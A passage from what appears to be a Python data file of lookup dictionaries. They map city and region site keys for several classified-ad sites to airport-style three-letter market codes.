"brisbane": "BNE",
"bristol": "BRS",
"brownsville": "BRO",
"brunswick": "BQK",
"brussels": "BRU",
"bucharest": "OTP",
"budapest": "BUD",
"buenosaires": "EZE",
"buffalo": "BUF",
"bulgaria": "SOF",
"burlington": "BTV",
"butte": "BTM",
"cadiz": "XRY",
"cairns": "CNS",
"cairo": "CAI",
"calgary": "YYC",
"cambridge": "CBG",
"canarias": "TFS",
"canberra": "CBR",
"capecod": "PVC",
"capetown": "CPT",
"caracas": "CCS",
"carbondale": "MDH",
"cardiff": "CWL",
"caribbean": "KIN",
"cariboo": "YXS",
"casablanca": "CMN",
"catskills": "20N",
"cdo": "CGY",
"cebu": "CEB",
"cedarrapids": "CID",
"cenla": "ESF",
"centralmich": "LAN",
"cfl": "SEF",
"chambana": "CMI",
"chambersburg": "N68",
"chandigarh": "IXC",
"charleston": "CHS",
"charlestonwv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chatham": "XCM",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chengdu": "CTU",
"chennai": "MAA",
"chicago": "ORD",
"chico": "CIC",
"chihuahua": "CUU",
"chillicothe": "RZT",
"chongqing": "CKG",
"christchurch": "CHC",
"cincinnati": "CVG",
"clarksville": "CKV",
"cleveland": "CLE",
"clovis": "CVN",
"cnj": "47N",
"collegestation": "CLL",
"cologne": "CGN",
"colombia": "BOG",
"columbia": "CAE",
"columbiamo": "COU",
"columbus": "CMH",
"columbusga": "CSG",
"comoxvalley": "YQQ",
"cookeville": "SRB",
"copenhagen": "CPH",
"cornwall": "YCC",
"corpuschristi": "CRP",
"corvallis": "CVO",
"cosprings": "COS",
"costarica": "SJO",
"cotedazur": "NCE",
"coventry": "CVT",
"cranbrook": "YXC",
"csd": "PIR",
"curitiba": "CWB",
"dalian": "DLC",
"dallas": "DFW",
"danville": "DAN",
"darwin": "DRW",
"davaocity": "DVO",
"dayton": "DAY",
"daytona": "DAB",
"decatur": "DEC",
"delaware": "ILG",
"delhi": "DEL",
"delrio": "DRT",
"denver": "DEN",
"derby": "EMA",
"desmoines": "DSM",
"detroit": "DTW",
"devon": "EXT",
"dothan": "DHN",
"dresden": "DRS",
"dubai": "DXB",
"dublin": "DUB",
"dubuque": "DBQ",
"duluth": "DLH",
"dundee": "DND",
"dunedin": "DUD",
"durban": "DUR",
"dusseldorf": "DUS",
"eastco": "LIC",
"easternshore": "SBY",
"eastidaho": "IDA",
"eastky": "PBX",
"eastmids": "EMA",
"eastnc": "PGV",
"eastoregon": "PDT",
"easttexas": "TYR",
"eauclaire": "EAU",
"edinburgh": "EDI",
"edmonton": "YEG",
"elko": "EKO",
"elmira": "ELM",
"elpaso": "ELP",
"elsalvador": "SAL",
"enid": "END",
"erie": "ERI",
"essen": "ESS",
"essex": "STN",
"eugene": "EUG",
"evansville": "EVV",
"fairbanks": "FAI",
"fargo": "FAR",
"farmington": "FMN",
"faro": "FAO",
"fayar": "XNA",
"fayetteville": "FAY",
"fingerlakes": "D82",
"flagstaff": "FLG",
"flint": "FNT",
"florence": "FLR",
"florencesc": "FLO",
"fortaleza": "FOR",
"fortcollins": "FNL",
"fortdodge": "FOD",
"fortlauderdale": "FLL",
"fortmyers": "RSW",
"fortsmith": "FSM",
"fortwayne": "FWA",
"frankfurt": "FRA",
"frederick": "FDK",
"fredericksburg": "EZF",
"fresno": "FAT",
"ftmcmurray": "YMM",
"fukuoka": "FUK",
"gadsden": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"geneva": "GVA",
"genoa": "GOA",
"glasgow": "GLA",
"glensfalls": "GFL",
"goa": "GOI",
"goldcoast": "OOL",
"goldcountry": "O22",
"granada": "GRX",
"grandforks": "GFK",
"grandisland": "GRI",
"grandrapids": "GRR",
"greatfalls": "GTF",
"greenbay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"grenoble": "GNB",
"guadalajara": "GDL",
"guanajuato": "BJX",
"guangzhou": "CAN",
"guatemala": "GUA",
"guelph": "",
"gulfport": "GPT",
"haifa": "HFA",
"halifax": "YHZ",
"hamburg": "HAM",
"hamilton": "YHM",
"hampshire": "SOU",
"hanford": "HJO",
"hangzhou": "HGH",
"hannover": "HAJ",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hat": "YXH",
"hattiesburg": "HBG",
"heidelberg": "HDB",
"helena": "HLN",
"helsinki": "HEL",
"hermosillo": "HMO",
"hickory": "HKY",
"hiltonhead": "HHH",
"hiroshima": "HIJ",
"hobart": "HBA",
"holland": "BIV",
"hongkong": "HKG",
"honolulu": "HNL",
"houma": "HUM",
"houston": "IAH",
"hudsonvalley": "SWF",
"humboldt": "ACV",
"huntington": "HTS",
"huntsville": "HSV",
"hyderabad": "HYD",
"iloilo": "ILO",
"imperial": "IPL",
"indianapolis": "IND",
"indore": "IDR",
"inlandempire": "ONT",
"iowacity": "IOW",
"istanbul": "IST",
"ithaca": "ITH",
"jackson": "JAN",
"jacksontn": "MKL",
"jacksonville": "JAX",
"jaipur": "JAI",
"jakarta": "CGK",
"janesville": "JVL",
"jerseyshore": "ACY",
"jerusalem": "",
"johannesburg": "JNB",
"jonesboro": "JBR",
"joplin": "JLN",
"juarez": "CJS",
"juneau": "JNU",
"jxn": "JXN",
"kaiserslautern": "RMS",
"kalamazoo": "AZO",
"kalispell": "FCA",
"kamloops": "YKA",
"kansascity": "MCI",
"kelowna": "YLW",
"kenai": "ENA",
"kent": "LYX",
"kenya": "NBO",
"kerala": "TRV",
"keys": "EYW",
"killeen": "GRK",
"kingston": "YGK",
"kirksville": "IRK",
"kitchener": "YKF",
"klamath": "LMT",
"knoxville": "TYS",
"kokomo": "OKK",
"kolkata": "CCU",
"kpr": "PSC",
"ksu": "MHK",
"kuwait": "KWI",
"lacrosse": "LSE",
"lafayette": "LFT",
"lakecharles": "LCH",
"lakecity": "LCQ",
"lakeland": "LAL",
"lancaster": "LNS",
"lansing": "LAN",
"lapaz": "LPB",
"laredo": "LRD",
"lasalle": "VYS",
"lascruces": "LRU",
"lasvegas": "LAS",
"lausanne": "",
"lawrence": "LWC",
"lawton": "LAW",
"leeds": "LBA",
"leipzig": "LEJ",
"lethbridge": "YQL",
"lewiston": "LWS",
"lexington": "LEX",
"lille": "LIL",
"lima": "LIM",
"limaohio": "AOH",
"lincoln": "LNK",
"lisbon": "LIS",
"littlerock": "LIT",
"liverpool": "LPL",
"logan": "LGU",
"loire": "NTE",
"london": "LHR",
"londonon": "YXU",
"longisland": "ISP",
"losangeles": "LAX",
"louisville": "SDF",
"loz": "AIZ",
"lubbock": "LBB",
"lucknow": "LKO",
"luxembourg": "LUX",
"lynchburg": "LYH",
"lyon": "LYS",
"macon": "MCN",
"madison": "MSN",
"madrid": "MAD",
"maine": "PWM",
"malaga": "AGP",
"malaysia": "KUL",
"managua": "MGA",
"manchester": "MAN",
"manila": "MNL",
"mankato": "MKT",
"mansfield": "MFD",
"marseilles": "MRS",
"marshall": "MML",
"martinsburg": "MRB",
"masoncity": "MCW",
"mattoon": "MTO",
"mazatlan": "MZT",
"mcallen": "MFE",
"meadville": "GKJ",
"medford": "MFR",
"melbourne": "MEL",
"memphis": "MEM",
"mendocino": "UKI",
"merced": "MCE",
"meridian": "MEI",
"mexicocity": "MEX",
"miami": "MIA",
"micronesia": "GUM",
"micronesia": "GUM",
"milan": "MXP",
"milwaukee": "MKE",
"minneapolis": "MSP",
"missoula": "MSO",
"mobile": "MOB",
"modesto": "MOD",
"mohave": "IFP",
"monroe": "MLU",
"monroemi": "TTF",
"montana": "GDV",
"monterey": "MRY",
"monterrey": "MTY",
"montevideo": "MVD",
"montgomery": "MGM",
"montpellier": "MPL",
"montreal": "YUL",
"morgantown": "MGW",
"moscow": "SVO",
"moseslake": "MWH",
"mumbai": "BOM",
"muncie": "MIE",
"munich": "MUC",
"muskegon": "MKG",
"myrtlebeach": "MYR",
"nacogdoches": "OCH",
"naga": "WNP",
"nagoya": "NGO",
"nanaimo": "YCD",
"nanjing": "NKG",
"naples": "NAP",
"nashville": "BNA",
"natchez": "HEZ",
"nd": "MOT",
"nesd": "ATY",
"newbrunswick": "YQM",
"newcastle": "NCL",
"newfoundland": "YYT",
"newhaven": "HVN",
"newjersey": "EWR",
"newlondon": "GON",
"neworleans": "MSY",
"newyork": "JFK",
"nh": "MHT",
"niagara": "YCM",
"nmi": "TVC",
"norfolk": "ORF",
"northernwi": "EAU",
"northmiss": "TUP",
"northplatte": "LBF",
"norwich": "NWI",
"nottingham": "NQT",
"ntl": "NTL",
"nuremberg": "NUE",
"nwct": "DXR",
"nwga": "RMG",
"nwks": "GLD",
"oaxaca": "OAX",
"ocala": "OCF",
"odessa": "MAF",
"ogden": "OGD",
"okaloosa": "VPS",
"okinawa": "OKA",
"oklahomacity": "OKC",
"olympic": "CLM",
"omaha": "OMA",
"oneonta": "ONH",
"onslow": "OAJ",
"orangecounty": "SNA",
"oregoncoast": "ONP",
"orlando": "MCO",
"osaka": "KIX",
"oslo": "OSL",
"ottawa": "YOW",
"ottumwa": "OTM",
"outerbanks": "FFA",
"owensboro": "OWB",
"owensound": "YOS",
"oxford": "OXF",
"pakistan": "KHI",
"palmsprings": "PSP",
"pampanga": "CRK",
"panama": "PAC",
"panamacity": "PFN",
"paris": "CDG",
"parkersburg": "PKB",
"peace": "YPE",
"pei": "YYG",
"pennstate": "UNV",
"pensacola": "PNS",
"peoria": "PIA",
"perth": "PER",
"perugia": "PEG",
"peterborough": "YPQ",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh": "PBG",
"poconos": "MPO",
"porthuron": "PHN",
"portland": "PDX",
"porto": "OPO",
"portoalegre": "POA",
"potsdam": "MSS",
"prague": "PRG",
"prescott": "PRC",
"pretoria": "PRY",
"princegeorge": "YXS",
"providence": "PVD",
"provo": "PVU",
"puebla": "PBC",
"pueblo": "PUB",
"puertorico": "SJU",
"puertorico": "SJU",
"pullman": "PUW",
"pune": "PNQ",
"pv": "PVR",
"quadcities": "MLI",
"quebec": "YQB",
"quincy": "UIN",
"quito": "UIO",
"racine": "RAC",
"raleigh": "RDU",
"ramallah": "JRS",
"rapidcity": "RAP",
"reading": "RDG",
"recife": "REC",
"reddeer": "YQF",
"redding": "RDD",
"regina": "YQR",
"rennes": "RNS",
"reno": "RNO",
"reykjavik": "RKV",
"richmond": "RIC",
"richmondin": "RID",
"rio": "GIG",
"rmn": "RST",
"roanoke": "ROA",
"rochester": "ROC",
"rockford": "RFD",
"rockies": "EGE",
"rome": "FCO",
"roseburg": "RBG",
"roswell": "ROW",
"rouen": "URO",
"sacramento": "SMF",
"saginaw": "MBS",
"saguenay": "YBG",
"salem": "SLE",
"salina": "SLN",
"saltlakecity": "SLC",
"salvador": "SSA",
"sanangelo": "SJT",
"sanantonio": "SAT",
"sandiego": "SAN",
"sandusky": "SKY",
"sanmarcos": "HYI",
"santabarbara": "SBA",
"santafe": "SAF",
"santamaria": "SMX",
"santiago": "SCL",
"santodomingo": "SDQ",
"saopaulo": "GRU",
"sapporo": "CTS",
"sarasota": "SRQ",
"sardinia": "CAG",
"sarnia": "YZR",
"saskatoon": "YXE",
"savannah": "SAV",
"scottsbluff": "BFF",
"scranton": "AVP",
"sd": "PIR",
"seattle": "SEA",
"seks": "FSK",
"semo": "CGI",
"sendai": "SDJ",
"seoul": "ICN",
"sevilla": "SVQ",
"sfbay": "SFO",
"shanghai": "SHA",
"sheboygan": "SBM",
"sheffield": "DSA",
"shenyang": "SHE",
"shenzhen": "SZX",
"sherbrooke": "YSC",
"shoals": "MSL",
"showlow": "SOW",
"shreveport": "SHV",
"sicily": "PMO",
"sierravista": "FHU",
"singapore": "SIN",
"siouxcity": "SUX",
"siouxfalls": "FSD",
"siskiyou": "SIY",
"skagit": "BVS",
"skeena": "YYD",
"slo": "SBP",
"smd": "2W6",
"soo": "YAM",
"southbend": "SBN",
"southcoast": "EWB",
"southjersey": "MIV",
"spacecoast": "TIX",
"spokane": "GEG",
"springfield": "SGF",
"springfieldil": "SPI",
"statesboro": "TBR",
"staugustine": "UST",
"stcloud": "STC",
"stgeorge": "SGU",
"stillwater": "SWO",
"stjoseph": "STJ",
"stlouis": "STL",
"stockholm": "ARN",
"stockton": "SCK",
"stpetersburg": "LED",
"strasbourg": "SXB",
"stuttgart": "STR",
"sudbury": "YSB",
"sunshine": "YHS",
"surat": "STV",
"susanville": "SVE",
"swks": "GCK",
"swmi": "BEH",
"swv": "BKW",
"swva": "MKJ",
"sydney": "SYD",
"syracuse": "SYR",
"taipei": "TPE",
"tallahassee": "TLH",
"tampa": "TPA",
"tehran": "IKA",
"telaviv": "TLV",
"terrehaute": "HUF",
"territories": "YZF",
"texarkana": "TXK",
"texoma": "GYI",
"thumb": "PHN",
"thunderbay": "YQT",
"tijuana": "TIJ",
"tippecanoe": "LAF",
"tokyo": "NRT",
"toledo": "TOL",
"topeka": "FOE",
"torino": "TRN",
"toronto": "YYZ",
"toulouse": "TLS",
"treasure": "VRB",
"tricities": "TRI",
"troisrivieres": "YRQ",
"tucson": "TUS",
"tulsa": "TUL",
"tunis": "TUN",
"tuscaloosa": "TCL",
"tuscarawas": "PHD",
"twinfalls": "TWF",
"twintiers": "OLE",
"ukraine": "IEV",
"up": "MQT",
"utica": "UCA",
"valdosta": "VLD",
"valencia": "VLC",
"vancouver": "YVR",
"venice": "VCE",
"ventura": "OXR",
"veracruz": "VER",
"victoria": "YYJ",
"victoriatx": "VCT",
"vienna": "VIE",
"vietnam": "SGN",
"virgin": "STT",
"virgin": "STT",
"visalia": "VIS",
"waco": "ACT",
"warsaw": "WAW",
"washingtondc": "IAD",
"waterloo": "ALO",
"watertown": "ART",
"wausau": "AUW",
"wellington": "WLG",
"wenatchee": "EAT",
"westernmass": "CEF",
"westky": "PAH",
"westmd": "CBE",
"westslope": "GJT",
"wheeling": "HLG",
"whistler": "YWS",
"whitehorse": "YXY",
"wichita": "ICT",
"wichitafalls": "SPS",
"williamsport": "IPT",
"wilmington": "ILM",
"winchester": "OKV",
"windsor": "YQG",
"winnipeg": "YWG",
"winstonsalem": "INT",
"wollongong": "WOL",
"worcester": "ORH",
"wuhan": "WUH",
"wv": "CRW",
"wyoming": "CPR",
"xian": "XIY",
"yakima": "YKM",
"yellowknife": "YZF",
"york": "THV",
"youngstown": "YNG",
"yubasutter": "MYV",
"yucatan": "MID",
"yuma": "YUM",
"zagreb": "ZAG",
"zamboanga": "ZAM",
"zanesville": "ZZV"}
# classivox_sitekey_to_marketid
classivox_sitekey_to_marketid = {
"abilene": "ABI",
"akron": "CAK",
"albany": "ALB",
"albany-ga": "ABY",
"albuquerque": "ABQ",
"altoona": "AOO",
"amarillo": "AMA",
"ames": "AMW",
"anchorage": "ANC",
"ann-arbor": "ARB",
"annapolis": "ANP",
"appleton": "ATW",
"asheville": "AVL",
"ashtabula": "HZY",
"athens": "AHN",
"athens-oh": "ATO",
"atlanta": "ATL",
"auburn": "AUO",
"augusta": "AGS",
"austin": "AUS",
"bakersfield": "BFL",
"baltimore": "BWI",
"baton-rouge": "BTR",
"battle-creek": "AZO",
"beaumont": "BPT",
"bellingham": "BLI",
"bemidji": "BJI",
"bend": "RDM",
"billings": "BIL",
"binghamton": "BGM",
"birmingham-al": "BHM",
"bismarck": "BIS",
"bloomington": "BMI",
"bloomington-in": "BMG",
"boise": "BOI",
"boone": "NC06",
"boston": "BOS",
"boulder": "WBU",
"bowling-green": "BWG",
"bozeman": "BZN",
"broward-county": "MIA",
"brownsville": "BRO",
"brunswick": "BQK",
"buffalo": "BUF",
"burlington": "BTV",
"calgary": "YYC",
"cape-cod": "PVC",
"catskills": "20N",
"cedar-rapids": "CID",
"central-mi": "LAN",
"central-nj": "47N",
"charleston": "CHS",
"charleston-wv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chicago": "ORD",
"chico": "CIC",
"chillicothe": "RZT",
"cincinnati": "CVG",
"clarksville": "CKV",
"cleveland": "CLE",
"clovis": "CVN",
"college-station": "CLL",
"colorado-springs": "COS",
"columbia": "COU",
"columbia-sc": "CAE",
"columbus": "CMH",
"columbus-oh": "CMH",
"comox-valley": "YQQ",
"cookeville": "SRB",
"corpus-christi": "CRP",
"corvallis": "CVO",
"cumberland": "CBE",
"dallas-ft-worth": "DFW",
"danville": "DAN",
"dayton": "DAY",
"daytona-beach": "DAB",
"decatur": "DEC",
"del-rio": "DRT",
"delaware": "ILG",
"denver": "DEN",
"des-moines": "DSM",
"detroit": "DTW",
"dothan": "DHN",
"dubuque": "DBQ",
"duluth": "DLH",
"east-oregon": "PDT",
"eastern-co": "LIC",
"eastern-ct": "GON",
"eastern-ky": "PBX",
"eastern-nc": "PGV",
"eastern-panhandle": "MRB",
"eastern-shore": "SBY",
"eau-claire": "EAU",
"edmonton": "YEG",
"el-paso": "ELP",
"elko": "EKO",
"elmira": "ELM",
"erie": "ERI",
"eugene": "EUG",
"evansville": "EVV",
"fairbanks": "FAI",
"fargo": "FAR",
"farmington": "FMN",
"fayetteville": "XNA",
"fayetteville-nc": "FAY",
"flagstaff-sedona": "FLG",
"flint": "FNT",
"florence": "FLO",
"florence-muscle-shoals": "MSL",
"florida-keys": "EYW",
"fort-collins": "FNL",
"fort-dodge": "FOD",
"fort-lauderdale": "FLL",
"fort-smith": "FSM",
"fort-wayne": "FWA",
"frederick": "FDK",
"fredericksburg-va": "EZF",
"fresno-madera": "FAT",
"ft-mcmurray": "YMM",
"gadsden-anniston": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"glens-falls": "GFL",
"gold-country": "O22",
"grand-forks": "GFK",
"grand-island": "GRI",
"grand-rapids": "GRR",
"green-bay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"guelph": "CNC4",
"gulfport": "GPT",
"hamilton-burlington": "YHM",
"hampton-roads": "ORF",
"hanford-corcoran": "HJO",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hattiesburg": "HBG",
"hickory": "HKY",
"high-rockies": "EGE",
"hilton-head": "HHH",
"holland": "BIV",
"honolulu": "HNL",
"houma": "HUM",
"houston": "IAH",
"hudson-valley": "SWF",
"humboldt-county": "ACV",
"huntington": "HTS",
"huntsville-decatur": "HSV",
"imperial-county": "IPL",
"indianapolis": "IND",
"inland-empire": "ONT",
"iowa-city": "IOW",
"ithaca": "ITH",
"jackson": "JAN",
"jackson-tn": "MKL",
"jacksonville": "JAX",
"jacksonville-nc": "OAJ",
"janesville": "JVL",
"jersey-shore": "ACY",
"jonesboro": "JBR",
"joplin": "JLN",
"kalamazoo": "AZO",
"kansas-city": "MCI",
"kenai-peninsula": "ENA",
"kennewick": "PSC",
"kenosha": "RAC",
"killeen": "GRK",
"kirksville": "IRK",
"klamath-falls": "LMT",
"knoxville": "TYS",
"kokomo": "OKK",
"lafayette": "LAF",
"lafayette-la": "LAF",
"lakeland": "LAL",
"lancaster": "LNS",
"lansing": "LAN",
"laredo": "LRD",
"las-cruces": "LRU",
"las-vegas": "LAS",
"lawrence": "LWC",
"lawton": "LAW",
"lehigh-valley": "ABE",
"lethbridge": "YQL",
"lewiston": "LWS",
"lexington": "LEX",
"lima-oh": "AOH",
"lincoln": "LNK",
"little-rock": "LIT",
"logan": "LGU",
"london-on": "YXU",
"long-island": "ISP",
"los-angeles": "LAX",
"louisville": "SDF",
"lubbock": "LBB",
"lynchburg": "LYH",
"macon": "MCN",
"madison": "MSN",
"maine": "PWM",
"manhattan": "JFK",
"mankato": "MKT",
"mansfield": "MFD",
"mason-city": "MCW",
"mattoon": "MTO",
"mcallen": "MFE",
"medford": "MFR",
"medicine-hat": "YXH",
"memphis": "MEM",
"mendocino-county": "UKI",
"merced": "MCE",
"miami-dade": "MIA",
"milwaukee": "MKE",
"minneapolis": "MSP",
"mobile": "MOB",
"modesto": "MOD",
"mohave-county": "IFP",
"monroe": "MLU",
"monroe-mi": "TTF",
"monterey-bay": "MRY",
"montgomery": "MGM",
"montreal": "YUL",
"morgantown": "MGW",
"moses-lake": "MWH",
"muncie": "MIE",
"muskegon": "MKG",
"myrtle-beach": "MYR",
"nanaimo": "YCD",
"nashville": "BNA",
"new-hampshire": "MHT",
"new-haven": "HVN",
"new-orleans": "MSY",
"new-river-valley": "BCB",
"new-york-city": "JFK",
"niagara": "YCM",
"north-dakota": "FAR",
"north-jersey": "EWR",
"north-ms": "TUP",
"north-panhandle": "HLG",
"north-platte": "LBF",
"northern-mi": "TVC",
"northern-wi": "EAU",
"northwest-ct": "DXR",
"northwest-ga": "RMG",
"ocala": "OCF",
"odessa": "MAF",
"ogden": "OGD",
"okaloosa": "VPS",
"oklahoma-city": "OKC",
"old-west-virginia": "CRW",
"omaha": "OMA",
"oneonta": "ONH",
"orange-county": "SNA",
"oregon-coast": "ONP",
"orlando": "MCO",
"outer-banks": "FFA",
"owen-sound": "YOS",
"owensboro": "OWB",
"ozarks": "AIZ",
"palm-beach-county": "PBI",
"palm-springs": "PSP",
"panama-city": "PFN",
"parkersburg": "PKB",
"peace-river-country": "YPE",
"pensacola": "PNS",
"peoria": "PIA",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh": "PBG",
"poconos": "MPO",
"portland": "PDX",
"potsdam": "MSS",
"prescott": "PRC",
"provo": "PVU",
"pueblo": "PUB",
"pullman": "PUW",
"quad-cities": "MLI",
"quebec-city": "YQB",
"queens": "JFK",
"raleigh": "RDU",
"reading": "RDG",
"red-deer": "YQF",
"redding": "RDD",
"regina": "YQR",
"reno": "RNO",
"richmond": "RID",
"roanoke": "ROA",
"rochester": "RST",
"rochester-ny": "ROC",
"rockford": "RFD",
"roseburg": "RBG",
"roswell": "ROW",
"sacramento": "SMF",
"saginaw": "MBS",
"salem": "SLE",
"salina": "SLN",
"salt-lake-city": "SLC",
"san-angelo": "SJT",
"san-antonio": "SAT",
"san-diego": "SAN",
"san-francisco": "SFO",
"san-luis-obispo": "SBP",
"san-marcos": "HYI",
"sandusky": "SKY",
"santa-barbara": "SBA",
"santa-fe": "SAF",
"santa-maria": "SMX",
"sarasota": "SRQ",
"savannah": "SAV",
"scottsbluff": "BFF",
"scranton": "AVP",
"seattle-tacoma": "SEA",
"sheboygan": "SBM",
"show-low": "SOW",
"shreveport": "SHV",
"sierra-vista": "FHU",
"sioux-city": "SUX",
"siskiyou-county": "SIY",
"south-bend": "SBN",
"south-coast": "EWB",
"south-dakota": "PIR",
"south-jersey": "MIV",
"south-wv": "BKW",
"southeast-alaska": "JNU",
"southeast-mo": "CGI",
"southern-il": "MDH",
"southern-md": "2W6",
"southwest-mn": "MML",
"southwest-va": "MKJ",
"space-coast": "TIX",
"spokane": "GEG",
"springfield": "SPI",
"springfield-mo": "SGF",
"st-augustine": "UST",
"st-cloud": "STC",
"st-george": "SGU",
"st-joseph": "STJ",
"st-louis": "STL",
"state-college": "UNV",
"statesboro": "TBR",
"stillwater": "SWO",
"stockton": "SCK",
"susanville": "SVE",
"syracuse": "SYR",
"tallahassee": "TLH",
"tampa-bay": "TPA",
"terre-haute": "HUF",
"texarkana": "TXK",
"texoma": "GYI",
"toledo": "TOL",
"topeka": "FOE",
"toronto": "YYZ",
"treasure-coast": "VRB",
"tri-cities": "TRI",
"tucson": "TUS",
"tulsa": "TUL",
"tuscaloosa": "TCL",
"twin-falls": "TWF",
"tyler": "TYR",
"utica": "UCA",
"valdosta": "VLD",
"ventura-county": "OXR",
"victoria-tx": "VCT",
"visalia-tulare": "VIS",
"waco": "ACT",
"washington-dc": "IAD",
"waterloo": "YKF",
"watertown": "ART",
"wausau": "AUW",
"wenatchee": "EAT",
"west-palm-beach": "PBI",
"western-il": "UIN",
"western-ky": "PAH",
"western-ma": "CEF",
"western-md": "CBE",
"western-slope": "GJT",
"wichita": "ICT",
"wichita-falls": "SPS",
"williamsport": "IPT",
"wilmington": "ILG",
"winchester": "OKV",
"winnipeg": "YWG",
"winston-salem": "INT",
"worcester": "ORH",
"yakima": "YKM",
"york": "THV",
"youngstown": "YNG",
"yuma": "YUM",
"zanesville": "ZZV"}
# myproviderguide_sitekey_to_marketid
myproviderguide_sitekey_to_marketid = {
"abilene": "ABI",
"akron": "CAK",
"albany": "ALB",
"albuquerque": "ABQ",
"allentown": "ABE",
"altoona": "AOO",
"amarillo": "AMA",
"ames-ia": "AMW",
"amsterdam": "AMS",
"ann-arbor": "ARB",
"annapolis": "ANP",
"appleton": "ATW",
"asheville": "AVL",
"athens-ga": "AHN",
"athens-oh": "ATO",
"atlanta": "ATL",
"auburn": "AUO",
"augusta": "AGS",
"austin": "AUS",
"bakersfield": "BFL",
"baltimore": "BWI",
"barrie": "QEB",
"bath": "BRS",
"baton-rouge": "BTR",
"beaumont": "BPT",
"belfast": "BFS",
"belleville": "YTR",
"bellingham": "BLI",
"bend": "RDM",
"berlin": "TXL",
"biloxi": "GPT",
"binghamton": "BGM",
"birmingham": "BHM",
"birmingham-uk": "BHX",
"bismarck": "BIS",
"blacksburg": "BCB",
"bloomington": "BMG",
"bloomington-normal": "BMI",
"boise": "BOI",
"boone": "NC06",
"boston": "BOS",
"boulder": "WBU",
"bowling-green": "BWG",
"brighton": "ESH",
"bristol": "BRS",
"bronx": "JFK",
"brooklyn": "JFK",
"brunswick-ga": "BQK",
"brussels": "BRU",
"budapest": "BUD",
"buffalo": "BUF",
"calgary": "YYC",
"cambridge": "CBG",
"cape-cod": "PVC",
"carbondale": "MDH",
"cardiff": "CWL",
"catskills": "20N",
"cedar-rapids": "CID",
"central-jersey": "47N",
"champaign": "CMI",
"charleston-sc": "CHS",
"charleston-wv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chatham": "XCM",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chicago": "ORD",
"chico": "CIC",
"cincinnati": "CVG",
"clarksville": "CKV",
"cleveland": "CLE",
"colorado-springs": "COS",
"columbia-sc": "CAE",
"columbus": "CMH",
"columbus-ga": "CSG",
"copenhagen": "CPH",
"cornwall": "YCC",
"corpus-christi": "CRP",
"corvallis": "CVO",
"coventry": "CVT",
"cranbrook": "YXC",
"dallas": "DFW",
"danville": "DAN",
"dayton": "DAY",
"daytona-beach": "DAB",
"decatur-il": "DEC",
"delaware": "ILG",
"denton": "DFW",
"denver": "DEN",
"derby": "EMA",
"des-moines": "DSM",
"detroit": "DTW",
"devon": "EXT",
"dothan-al": "DHN",
"dublin": "DUB",
"dubuque": "DBQ",
"duluth": "DLH",
"dundee": "DND",
"eau-claire": "EAU",
"edinburgh": "EDI",
"edmonton": "YEG",
"elmira-corning": "ELM",
"erie-pa": "ERI",
"essex": "STN",
"eugene": "EUG",
"evansville": "EVV",
"fargo": "FAR",
"farmington-nm": "FMN",
"fayetteville": "FAY",
"fayetteville-ar": "XNA",
"flagstaff": "FLG",
"flint": "FNT",
"florence": "FLO",
"florence-sc": "FLO",
"florida-keys": "EYW",
"fort-collins": "FNL",
"fort-lauderdale": "FLL",
"fort-myers": "RSW",
"fort-smith-ar": "FSM",
"fort-wayne": "FWA",
"fort-worth": "DFW",
"fredericksburg": "EZF",
"fresno": "FAT",
"gadsden-anniston": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"glasgow": "GLA",
"gold-country": "O22",
"grand-island": "GRI",
"grand-rapids": "GRR",
"green-bay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"guelph": "CNC4",
"halifax": "YHZ",
"hamilton": "YHM",
"hampshire": "SOU",
"hampton": "ORF",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hattiesburg": "HBG",
"hickory": "HKY",
"hilton-head": "HHH",
"honolulu": "HNL",
"houston": "IAH",
"hudson-valley": "SWF",
"humboldt-county": "ACV",
"huntington-ashland": "HTS",
"huntsville": "HSV",
"imperial-county": "IPL",
"indianapolis": "IND",
"inland-empire": "ONT",
"iowa-city": "IOW",
"ithaca": "ITH",
"jackson-mi": "JXN",
"jackson-ms": "JAN",
"jackson-tn": "MKL",
"jacksonville": "JAX",
"janesville": "JVL",
"jersey-shore": "ACY",
"jonesboro": "JBR",
"joplin": "JLN",
"kalamazoo": "AZO",
"kamloops": "YKA",
"kansas-city": "MCI",
"kelowna": "YLW",
"kennewick-pasco-richland": "PSC",
"kenosha-racine": "RAC",
"kent": "LYX",
"killeen": "GRK",
"kingston": "YGK",
"kitchener": "YKF",
"knoxville": "TYS",
"la-crosse": "LSE",
"lafayette": "LFT",
"lake-charles": "LCH",
"lakeland": "LAL",
"lancaster-pa": "LNS",
"lansing": "LAN",
"laredo": "LRD",
"las-vegas": "LAS",
"lawrence": "LWC",
"lawton": "LAW",
"leeds": "LBA",
"lehigh-valley": "ABE",
"lethbridge": "YQL",
"lexington-ky": "LEX",
"lima": "AOH",
"lincoln": "LNK",
"little-rock": "LIT",
"liverpool": "LPL",
"logan": "LGU",
"london": "LHR",
"london-canada": "YXU",
"long-island": "ISP",
"los-angeles": "LAX",
"louisville": "SDF",
"lubbock": "LBB",
"lynchburg": "LYH",
"macon": "MCN",
"madison": "MSN",
"maine": "PWM",
"manchester": "MAN",
"manhattan-ks": "MHK",
"mankato": "MKT",
"mansfield": "MFD",
"martinsburg": "MRB",
"medford-ashland-klamath": "MFR",
"memphis": "MEM",
"mendocino-county": "UKI",
"merced": "MCE",
"miami": "MIA",
"milwaukee": "MKE",
"minneapolis": "MSP",
"minot": "MOT",
"mobile": "MOB",
"modesto": "MOD",
"mohave-county": "IFP",
"monroe-la": "MLU",
"montana": "HLN",
"monterey-bay": "MRY",
"montgomery": "MGM",
"montreal": "YUL",
"morgantown": "MGW",
"mumbai": "BOM",
"muncie": "MIE",
